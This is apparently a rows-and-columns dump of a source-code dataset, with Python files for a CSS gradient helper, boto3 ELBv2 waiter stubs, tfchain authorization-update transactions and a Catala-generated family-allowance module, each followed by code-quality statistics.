hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b45f24a20a8a02a724a15307a9c1907ba114019f
| 130
|
py
|
Python
|
nouns/css/__init__.py
|
vcdi/nouns
|
4bec17265fcaa757446e32b57540efe9b20d8ea0
|
[
"BSD-3-Clause"
] | null | null | null |
nouns/css/__init__.py
|
vcdi/nouns
|
4bec17265fcaa757446e32b57540efe9b20d8ea0
|
[
"BSD-3-Clause"
] | null | null | null |
nouns/css/__init__.py
|
vcdi/nouns
|
4bec17265fcaa757446e32b57540efe9b20d8ea0
|
[
"BSD-3-Clause"
] | null | null | null |
def histo_bar(a, b):
    """Return an inline CSS declaration drawing a horizontal bar from a% to b%.

    The bar is rendered as a #eee band between ``a`` percent and ``b`` percent
    of the element's width, transparent elsewhere.

    :param a: left edge of the band, as a percentage (number).
    :param b: right edge of the band, as a percentage (number).
    :return: a ``background: linear-gradient(...)`` CSS string.
    """
    # BUG FIX: the original string never closed the linear-gradient( call,
    # which produces invalid CSS that browsers drop entirely.
    return f"background: linear-gradient(to right, transparent {a}%, #eee {a}%, #eee {b}%, transparent {b}%)"
| 43.333333
| 108
| 0.646154
| 20
| 130
| 4.15
| 0.7
| 0.096386
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146154
| 130
| 2
| 109
| 65
| 0.747748
| 0
| 0
| 0
| 0
| 0.5
| 0.723077
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
81fc9e03ce5881a3fced02c23d0afa40268a92b8
| 930
|
py
|
Python
|
boto3_type_annotations/boto3_type_annotations/elbv2/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations/boto3_type_annotations/elbv2/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations/boto3_type_annotations/elbv2/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import List
from typing import Dict
from botocore.waiter import Waiter
class LoadBalancerAvailable(Waiter):
    # Type-annotation stub only (no runtime behavior); the real implementation
    # is provided by botocore's generated ELBv2 waiter.
    def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
        """Stub signature for the ELBv2 ``load_balancer_available`` waiter."""
        pass
class LoadBalancerExists(Waiter):
    # Type-annotation stub only (no runtime behavior); the real implementation
    # is provided by botocore's generated ELBv2 waiter.
    def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
        """Stub signature for the ELBv2 ``load_balancer_exists`` waiter."""
        pass
class LoadBalancersDeleted(Waiter):
    # Type-annotation stub only (no runtime behavior); the real implementation
    # is provided by botocore's generated ELBv2 waiter.
    def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
        """Stub signature for the ELBv2 ``load_balancers_deleted`` waiter."""
        pass
class TargetDeregistered(Waiter):
    # Type-annotation stub only (no runtime behavior); the real implementation
    # is provided by botocore's generated ELBv2 waiter.
    def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
        """Stub signature for the ELBv2 ``target_deregistered`` waiter."""
        pass
class TargetInService(Waiter):
    # Type-annotation stub only (no runtime behavior); the real implementation
    # is provided by botocore's generated ELBv2 waiter.
    def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
        """Stub signature for the ELBv2 ``target_in_service`` waiter."""
        pass
| 32.068966
| 139
| 0.7
| 109
| 930
| 5.972477
| 0.247706
| 0.09831
| 0.099846
| 0.130568
| 0.743472
| 0.743472
| 0.735791
| 0.735791
| 0.735791
| 0.735791
| 0
| 0
| 0.201075
| 930
| 28
| 140
| 33.214286
| 0.876178
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.277778
| false
| 0.277778
| 0.166667
| 0
| 0.722222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
c31a07065a140522cf5d1d54a85f2389ca0f48c1
| 14,377
|
py
|
Python
|
scripts/conversion/tfchaintypes/transactions/Authcoin.py
|
threefoldadmin/tft-stellar
|
78b3b0b6f35435b3ed068b60c0cf6198612bb21f
|
[
"Apache-2.0"
] | 7
|
2020-02-05T16:10:46.000Z
|
2021-04-28T10:39:20.000Z
|
scripts/conversion/tfchaintypes/transactions/Authcoin.py
|
threefoldadmin/tft-stellar
|
78b3b0b6f35435b3ed068b60c0cf6198612bb21f
|
[
"Apache-2.0"
] | 379
|
2020-01-13T10:22:21.000Z
|
2022-03-23T08:59:57.000Z
|
scripts/conversion/tfchaintypes/transactions/Authcoin.py
|
threefoldadmin/tft-stellar
|
78b3b0b6f35435b3ed068b60c0cf6198612bb21f
|
[
"Apache-2.0"
] | 3
|
2020-01-24T09:56:44.000Z
|
2020-08-03T21:02:38.000Z
|
import random
from .Base import TransactionBaseClass, TransactionVersion
from ..FulfillmentTypes import FulfillmentBaseClass, FulfillmentSingleSignature, FulfillmentFactory
from ..ConditionTypes import ConditionBaseClass, ConditionNil, UnlockHash
from ..PrimitiveTypes import BinaryData, Currency
from ..IO import CoinInput, CoinOutput
def _generateXByteID(x):
out = bytearray()
for i in range(0, x):
out.append(random.randint(0, 255))
return out
class TransactionV176(TransactionBaseClass):
    """AuthAddressUpdate Transaction (v176).

    Authorizes and/or deauthorizes unlock hashes (addresses); the update is
    fulfilled against the chain's current (parent) auth condition.
    """

    _SPECIFIER = b"auth addr update"

    def __init__(self):
        # Random 8-byte nonce so two otherwise-identical updates still differ.
        self._nonce = BinaryData(_generateXByteID(8), strencoding="base64")
        self._auth_fulfillment = None
        self._auth_addresses = []
        self._deauth_addresses = []
        self._data = None
        self._miner_fees = []
        # current mint condition
        self._parent_auth_condition = None
        super().__init__()

    @property
    def version(self):
        """Version number identifying this transaction type."""
        return TransactionVersion.AUTH_ADDRESS_UPDATE

    @property
    def data(self):
        """
        Optional binary data attached to this Transaction,
        with a max length of 83 bytes.
        """
        if self._data is None:
            return BinaryData(strencoding="base64")
        return self._data

    @data.setter
    def data(self, value):
        if value is None:
            self._data = None
            return
        if isinstance(value, BinaryData):
            value = value.value
        elif isinstance(value, str):
            value = value.encode("utf-8")
        if len(value) > 83:
            raise Exception(
                "arbitrary data can have a maximum bytes length of 83, {} exceeds this limit".format(len(value))
            )
        self._data = BinaryData(value=value, strencoding="base64")

    @property
    def auth_addresses(self):
        """
        Unlock hashes to be authorized by this transaction
        """
        return self._auth_addresses

    @auth_addresses.setter
    def auth_addresses(self, value):
        self._auth_addresses = []
        if not value:
            return
        for uh in value:
            self.auth_addresses_add(uh)

    def auth_addresses_add(self, uh):
        """Append one unlock hash (UnlockHash or its JSON str form) to authorize."""
        if isinstance(uh, UnlockHash):
            self._auth_addresses.append(uh)
        elif isinstance(uh, str):
            self._auth_addresses.append(UnlockHash.from_json(uh))
        else:
            raise Exception("invalid type of uh {} (expected: UnlockHash or str)".format(type(uh)))

    @property
    def deauth_addresses(self):
        """
        Unlock hashes to be deauthorized by this transaction
        """
        return self._deauth_addresses

    @deauth_addresses.setter
    def deauth_addresses(self, value):
        self._deauth_addresses = []
        if not value:
            return
        for uh in value:
            self.deauth_addresses_add(uh)

    def deauth_addresses_add(self, uh):
        """Append one unlock hash (UnlockHash or its JSON str form) to deauthorize."""
        if isinstance(uh, UnlockHash):
            self._deauth_addresses.append(uh)
        elif isinstance(uh, str):
            self._deauth_addresses.append(UnlockHash.from_json(uh))
        else:
            raise Exception("invalid type of uh {} (expected: UnlockHash or str)".format(type(uh)))

    def auth_fulfillment_defined(self):
        """Return True when an auth fulfillment has been explicitly set."""
        return self._auth_fulfillment is not None

    @property
    def auth_fulfillment(self):
        """
        Retrieve the current auth fulfillment
        """
        if self._auth_fulfillment is None:
            return FulfillmentSingleSignature()
        return self._auth_fulfillment

    @auth_fulfillment.setter
    def auth_fulfillment(self, value):
        if value is None:
            self._auth_fulfillment = None
            return
        if not isinstance(value, FulfillmentBaseClass):
            # BUG FIX: original read `raise Exzception(...)` — a NameError at
            # raise time instead of the intended type-check Exception.
            raise Exception(
                "AuthAddressUpdate (v176) Transaction's auth fulfillment has to be a subtype of FulfillmentBaseClass, not {}".format(
                    type(value)
                )
            )
        self._auth_fulfillment = value

    @property
    def parent_auth_condition(self):
        """
        Retrieve the parent auth condition which will be set
        """
        if self._parent_auth_condition is None:
            return ConditionNil()
        return self._parent_auth_condition

    @parent_auth_condition.setter
    def parent_auth_condition(self, value):
        if value is None:
            self._parent_auth_condition = None
            return
        if not isinstance(value, ConditionBaseClass):
            raise Exception(
                "AuthAddressUpdate (v176) Transaction's parent auth condition has to be a subtype of ConditionBaseClass, not {}".format(
                    type(value)
                )
            )
        self._parent_auth_condition = value

    def miner_fee_add(self, value):
        """Append a miner fee (any value Currency accepts) to this transaction."""
        self._miner_fees.append(Currency(value=value))

    @property
    def miner_fees(self):
        """
        Miner fees, paid to the block creator of this Transaction,
        funded by this Transaction's coin inputs.
        """
        return self._miner_fees

    def _signature_hash_input_get(self, *extra_objects):
        # NOTE(review): `j` is never imported in this module's visible imports;
        # presumably a jumpscale-style global injected elsewhere — confirm.
        e = j.data.rivine.encoder_sia_get()
        # encode the transaction version
        e.add_byte(self.version)
        # encode the specifier
        e.add_array(TransactionV176._SPECIFIER)
        # encode nonce
        e.add_array(self._nonce.value)
        # extra objects if any
        # TODO: is this needed??
        if extra_objects:
            e.add_all(*extra_objects)
        # encode auth addresses
        e.add_slice(self.auth_addresses)
        # encode deauth addresses
        e.add_slice(self.deauth_addresses)
        # encode miner fees
        e.add_slice(self.miner_fees)
        # encode custom data
        e.add(self.data)
        # return the encoded data
        return e.data

    def _id_input_compute(self):
        """Return the byte input from which this transaction's ID is computed."""
        return bytearray(TransactionV176._SPECIFIER) + self._binary_encode_data()

    def _binary_encode_data(self):
        """Return the rivine-encoded binary form of this transaction's data."""
        encoder = j.data.rivine.encoder_rivine_get()
        encoder.add_array(self._nonce.value)
        encoder.add_all(self.auth_addresses, self.deauth_addresses, self.data, self.auth_fulfillment, self.miner_fees)
        return encoder.data

    def _from_json_data_object(self, data):
        """Populate this transaction's fields from a decoded JSON object."""
        self._nonce = BinaryData.from_json(data.get("nonce", ""), strencoding="base64")
        self._auth_addresses = [UnlockHash.from_json(uh) for uh in data.get("authaddresses", []) or []]
        self._deauth_addresses = [UnlockHash.from_json(uh) for uh in data.get("deauthaddresses", []) or []]
        self._auth_fulfillment = FulfillmentFactory.from_json(data.get("authfulfillment", {}))
        self._miner_fees = [Currency.from_json(fee) for fee in data.get("minerfees", []) or []]
        self._data = BinaryData.from_json(data.get("arbitrarydata", None) or "", strencoding="base64")

    def _json_data_object(self):
        """Return the JSON-serializable dict form of this transaction's data."""
        return {
            "nonce": self._nonce.json(),
            "authaddresses": [uh.json() for uh in self.auth_addresses],
            "deauthaddresses": [uh.json() for uh in self.deauth_addresses],
            "arbitrarydata": self.data.json(),
            "authfulfillment": self.auth_fulfillment.json(),
            "minerfees": [fee.json() for fee in self._miner_fees],
        }

    def _extra_signature_requests_new(self):
        if self._parent_auth_condition is None:
            return []  # nothing to be signed
        return self._auth_fulfillment.signature_requests_new(
            input_hash_func=self.signature_hash_get,  # no extra objects are to be included within txn scope
            parent_condition=self._parent_auth_condition,
        )

    def _extra_is_fulfilled(self):
        if self._parent_auth_condition is None:
            return False
        return self.auth_fulfillment.is_fulfilled(parent_condition=self._parent_auth_condition)
class TransactionV177(TransactionBaseClass):
    """AuthConditionUpdate Transaction (v177).

    Replaces the chain's auth condition with a new one; the update is
    fulfilled against the current (parent) auth condition.
    """

    _SPECIFIER = b"auth cond update"

    def __init__(self):
        # CONSISTENCY/BUG FIX: use the module-local _generateXByteID helper,
        # exactly as TransactionV176 does. The original called
        # `j.data.idgenerator.generateXByteID(8)` although `j` is never
        # imported in this file, which would raise NameError on construction.
        self._nonce = BinaryData(_generateXByteID(8), strencoding="base64")
        self._auth_fulfillment = None
        self._auth_condition = None
        self._data = None
        self._miner_fees = []
        # current auth condition
        self._parent_auth_condition = None
        super().__init__()

    @property
    def version(self):
        """Version number identifying this transaction type."""
        return TransactionVersion.AUTH_CONDITION_UPDATE

    @property
    def data(self):
        """
        Optional binary data attached to this Transaction,
        with a max length of 83 bytes.
        """
        if self._data is None:
            return BinaryData(strencoding="base64")
        return self._data

    @data.setter
    def data(self, value):
        if value is None:
            self._data = None
            return
        if isinstance(value, BinaryData):
            value = value.value
        elif isinstance(value, str):
            value = value.encode("utf-8")
        if len(value) > 83:
            raise Exception(
                "arbitrary data can have a maximum bytes length of 83, {} exceeds this limit".format(len(value))
            )
        self._data = BinaryData(value=value, strencoding="base64")

    @property
    def auth_condition(self):
        """
        Retrieve the new auth condition which will be set
        """
        if self._auth_condition is None:
            return ConditionNil()
        return self._auth_condition

    @auth_condition.setter
    def auth_condition(self, value):
        if value is None:
            self._auth_condition = None
            return
        if not isinstance(value, ConditionBaseClass):
            raise Exception(
                "AuthConditionDefinition (v177) Transaction's auth condition has to be a subtype of ConditionBaseClass, not {}".format(
                    type(value)
                )
            )
        self._auth_condition = value

    @property
    def parent_auth_condition(self):
        """
        Retrieve the parent auth condition which will be set
        """
        if self._parent_auth_condition is None:
            return ConditionNil()
        return self._parent_auth_condition

    @parent_auth_condition.setter
    def parent_auth_condition(self, value):
        if value is None:
            self._parent_auth_condition = None
            return
        if not isinstance(value, ConditionBaseClass):
            # TYPO FIX: error message read "AuthCondtionDefinition"; corrected
            # to match the other (v177) messages in this class.
            raise Exception(
                "AuthConditionDefinition (v177) Transaction's parent auth condition has to be a subtype of ConditionBaseClass, not {}".format(
                    type(value)
                )
            )
        self._parent_auth_condition = value

    def auth_fulfillment_defined(self):
        """Return True when an auth fulfillment has been explicitly set."""
        return self._auth_fulfillment is not None

    @property
    def auth_fulfillment(self):
        """
        Retrieve the current auth fulfillment
        """
        if self._auth_fulfillment is None:
            return FulfillmentSingleSignature()
        return self._auth_fulfillment

    @auth_fulfillment.setter
    def auth_fulfillment(self, value):
        if value is None:
            self._auth_fulfillment = None
            return
        if not isinstance(value, FulfillmentBaseClass):
            raise Exception(
                "AuthConditionDefinition (v177) Transaction's auth fulfillment has to be a subtype of FulfillmentBaseClass, not {}".format(
                    type(value)
                )
            )
        self._auth_fulfillment = value

    def miner_fee_add(self, value):
        """Append a miner fee (any value Currency accepts) to this transaction."""
        self._miner_fees.append(Currency(value=value))

    @property
    def miner_fees(self):
        """
        Miner fees, paid to the block creator of this Transaction,
        funded by this Transaction's coin inputs.
        """
        return self._miner_fees

    def _signature_hash_input_get(self, *extra_objects):
        # NOTE(review): `j` is never imported in this module's visible imports;
        # presumably a jumpscale-style global injected elsewhere — confirm.
        e = j.data.rivine.encoder_sia_get()
        # encode the transaction version
        e.add_byte(self.version)
        # encode the specifier
        e.add_array(TransactionV177._SPECIFIER)
        # encode nonce
        e.add_array(self._nonce.value)
        # extra objects if any
        if extra_objects:
            e.add_all(*extra_objects)
        # encode new mint condition
        e.add(self.auth_condition)
        # encode custom data
        e.add(self.data)
        # encode miner fees
        e.add_slice(self.miner_fees)
        # return the encoded data
        return e.data

    def _id_input_compute(self):
        """Return the byte input from which this transaction's ID is computed."""
        return bytearray(TransactionV177._SPECIFIER) + self._binary_encode_data()

    def _binary_encode_data(self):
        """Return the rivine-encoded binary form of this transaction's data."""
        encoder = j.data.rivine.encoder_rivine_get()
        encoder.add_array(self._nonce.value)
        encoder.add_all(self.data, self.auth_condition, self.auth_fulfillment, self.miner_fees)
        return encoder.data

    def _from_json_data_object(self, data):
        """Populate this transaction's fields from a decoded JSON object."""
        self._nonce = BinaryData.from_json(data.get("nonce", ""), strencoding="base64")
        self._auth_condition = j.clients.tfchain.types.conditions.from_json(data.get("authcondition", {}))
        self._auth_fulfillment = j.clients.tfchain.types.fulfillments.from_json(data.get("authfulfillment", {}))
        self._miner_fees = [Currency.from_json(fee) for fee in data.get("minerfees", []) or []]
        self._data = BinaryData.from_json(data.get("arbitrarydata", None) or "", strencoding="base64")

    def _json_data_object(self):
        """Return the JSON-serializable dict form of this transaction's data."""
        return {
            "nonce": self._nonce.json(),
            "authfulfillment": self.auth_fulfillment.json(),
            "authcondition": self.auth_condition.json(),
            "minerfees": [fee.json() for fee in self._miner_fees],
            "arbitrarydata": self.data.json(),
        }

    def _extra_signature_requests_new(self):
        if self._parent_auth_condition is None:
            return []  # nothing to be signed
        return self._auth_fulfillment.signature_requests_new(
            input_hash_func=self.signature_hash_get,  # no extra objects are to be included within txn scope
            parent_condition=self._parent_auth_condition,
        )

    def _extra_is_fulfilled(self):
        if self._parent_auth_condition is None:
            return False
        return self.auth_fulfillment.is_fulfilled(parent_condition=self._parent_auth_condition)
| 33.512821
| 141
| 0.630243
| 1,618
| 14,377
| 5.370828
| 0.111867
| 0.065823
| 0.06122
| 0.047641
| 0.83786
| 0.822325
| 0.802532
| 0.772727
| 0.74557
| 0.713003
| 0
| 0.007198
| 0.284969
| 14,377
| 428
| 142
| 33.591122
| 0.838132
| 0.089379
| 0
| 0.731544
| 0
| 0
| 0.090589
| 0.008605
| 0
| 0
| 0
| 0.002336
| 0
| 1
| 0.151007
| false
| 0
| 0.020134
| 0.026846
| 0.345638
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c32041b96f53225e614982e7f87d28f5db514010
| 317,800
|
py
|
Python
|
french_law/python/src/allocations_familiales.py
|
isovector/catala
|
5663c616fdb124ac469f72cd5429fe92cdde1ed0
|
[
"Apache-2.0"
] | null | null | null |
french_law/python/src/allocations_familiales.py
|
isovector/catala
|
5663c616fdb124ac469f72cd5429fe92cdde1ed0
|
[
"Apache-2.0"
] | null | null | null |
french_law/python/src/allocations_familiales.py
|
isovector/catala
|
5663c616fdb124ac469f72cd5429fe92cdde1ed0
|
[
"Apache-2.0"
] | null | null | null |
# This file has been generated by the Catala compiler, do not edit!
from .catala import *
from typing import Any, List, Callable, Tuple
from enum import Enum
class PriseEnCharge_Code(Enum):
    # Generated by the Catala compiler (do not edit): tags for the
    # PriseEnCharge tagged union.
    GardeAlterneePartageAllocations = 0
    GardeAlterneeAllocataireUnique = 1
    EffectiveEtPermanente = 2
    ServicesSociauxAllocationVerseeALaFamille = 3
    ServicesSociauxAllocationVerseeAuxServicesSociaux = 4
class PriseEnCharge:
    """Generated tagged union: a PriseEnCharge_Code tag plus its payload value."""
    def __init__(self, code: PriseEnCharge_Code, value: Any) -> None:
        self.code = code
        self.value = value
    def __eq__(self, other: object) -> bool:
        # Equal only to another PriseEnCharge with the same tag and payload.
        if isinstance(other, PriseEnCharge):
            return self.code == other.code and self.value == other.value
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "{}({})".format(self.code, self.value)
class SituationObligationScolaire_Code(Enum):
    # Generated by the Catala compiler (do not edit): tags for the
    # SituationObligationScolaire tagged union.
    Avant = 0
    Pendant = 1
    Apres = 2
class SituationObligationScolaire:
    """Generated tagged union: a SituationObligationScolaire_Code tag plus its payload value."""
    def __init__(self, code: SituationObligationScolaire_Code, value: Any) -> None:
        self.code = code
        self.value = value
    def __eq__(self, other: object) -> bool:
        # Equal only to another SituationObligationScolaire with the same tag and payload.
        if isinstance(other, SituationObligationScolaire):
            return self.code == other.code and self.value == other.value
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "{}({})".format(self.code, self.value)
class Collectivite_Code(Enum):
    # Generated by the Catala compiler (do not edit): tags for the
    # Collectivite tagged union.
    Guadeloupe = 0
    Guyane = 1
    Martinique = 2
    LaReunion = 3
    SaintBarthelemy = 4
    SaintMartin = 5
    Metropole = 6
    SaintPierreEtMiquelon = 7
    Mayotte = 8
class Collectivite:
    """Generated tagged union: a Collectivite_Code tag plus its payload value."""
    def __init__(self, code: Collectivite_Code, value: Any) -> None:
        self.code = code
        self.value = value
    def __eq__(self, other: object) -> bool:
        # Equal only to another Collectivite with the same tag and payload.
        if isinstance(other, Collectivite):
            return self.code == other.code and self.value == other.value
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "{}({})".format(self.code, self.value)
class PriseEnCompte_Code(Enum):
    # Generated by the Catala compiler (do not edit): tags for the
    # PriseEnCompte tagged union.
    Complete = 0
    Partagee = 1
    Zero = 2
class PriseEnCompte:
    """Generated tagged union: a PriseEnCompte_Code tag plus its payload value."""
    def __init__(self, code: PriseEnCompte_Code, value: Any) -> None:
        self.code = code
        self.value = value
    def __eq__(self, other: object) -> bool:
        # Equal only to another PriseEnCompte with the same tag and payload.
        if isinstance(other, PriseEnCompte):
            return self.code == other.code and self.value == other.value
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "{}({})".format(self.code, self.value)
class VersementAllocations_Code(Enum):
    # Generated by the Catala compiler (do not edit): tags for the
    # VersementAllocations tagged union.
    Normal = 0
    AllocationVerseeAuxServicesSociaux = 1
class VersementAllocations:
    """Generated tagged union: a VersementAllocations_Code tag plus its payload value."""
    def __init__(self, code: VersementAllocations_Code, value: Any) -> None:
        self.code = code
        self.value = value
    def __eq__(self, other: object) -> bool:
        # Equal only to another VersementAllocations with the same tag and payload.
        if isinstance(other, VersementAllocations):
            return self.code == other.code and self.value == other.value
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "{}({})".format(self.code, self.value)
class ElementPrestationsFamiliales_Code(Enum):
    # Generated by the Catala compiler (do not edit): tags for the
    # ElementPrestationsFamiliales tagged union.
    PrestationAccueilJeuneEnfant = 0
    AllocationsFamiliales = 1
    ComplementFamilial = 2
    AllocationLogement = 3
    AllocationEducationEnfantHandicape = 4
    AllocationSoutienFamilial = 5
    AllocationRentreeScolaire = 6
    AllocationJournalierePresenceParentale = 7
class ElementPrestationsFamiliales:
    """Generated tagged union: an ElementPrestationsFamiliales_Code tag plus its payload value."""
    def __init__(self, code: ElementPrestationsFamiliales_Code, value: Any) -> None:
        self.code = code
        self.value = value
    def __eq__(self, other: object) -> bool:
        # Equal only to another ElementPrestationsFamiliales with the same tag and payload.
        if isinstance(other, ElementPrestationsFamiliales):
            return self.code == other.code and self.value == other.value
        else:
            return False
    def __ne__(self, other: object) -> bool:
        return not (self == other)
    def __str__(self) -> str:
        return "{}({})".format(self.code, self.value)
class EnfantEntree:
    """Generated record: raw child data as supplied by the caller (field-by-field equality)."""
    def __init__(self, d_identifiant: Integer, d_remuneration_mensuelle: Money, d_date_de_naissance: Date, d_prise_en_charge: PriseEnCharge, d_a_deja_ouvert_droit_aux_allocations_familiales: bool) -> None:
        self.d_identifiant = d_identifiant
        self.d_remuneration_mensuelle = d_remuneration_mensuelle
        self.d_date_de_naissance = d_date_de_naissance
        self.d_prise_en_charge = d_prise_en_charge
        self.d_a_deja_ouvert_droit_aux_allocations_familiales = d_a_deja_ouvert_droit_aux_allocations_familiales
    def __eq__(self, other: object) -> bool:
        if isinstance(other, EnfantEntree):
            return (self.d_identifiant == other.d_identifiant and
                self.d_remuneration_mensuelle == other.d_remuneration_mensuelle and
                self.d_date_de_naissance == other.d_date_de_naissance and
                self.d_prise_en_charge == other.d_prise_en_charge and
